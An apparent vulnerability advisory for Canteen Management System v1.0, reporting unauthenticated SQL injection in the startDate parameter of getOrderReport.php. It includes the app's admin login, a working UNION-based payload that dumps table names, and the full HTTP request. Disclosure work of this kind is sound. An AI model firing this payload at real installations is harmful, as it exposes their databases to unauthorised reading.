SQL injection in Canteen Management System v1.0.

# SQL injection in Canteen Management System v1.0. ## Bug author: Tuannq (https://github.com/tuannq2299) Discovered Day: 5/1/2023 Vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html Login account: `mayuri.infospace@gmail.com/rootadmin` (Super Admin account) Vulnerability File: /php_action/getOrderReport.php Vulnerability location: /php_action/getOrderReport.php, `startDate` **CVSS 3.0**: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) Payload: `startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-` ``` POST /youthappam/php_action/getOrderReport.php HTTP/1.1 Host: localhost Content-Length: 297 Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://localhost/youthappam/report.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06 ``` The request can be sent by an unauthenticated user, for that reason, the CVSS of this vulnerability is **9.8** ## PoC ![](https://i.imgur.com/sXcZPbI.png) ## Source Code Analysis The value of `startDate` parameter was passed to the SQL query and executed without any sanitized. ![](https://i.imgur.com/juWQqAL.png)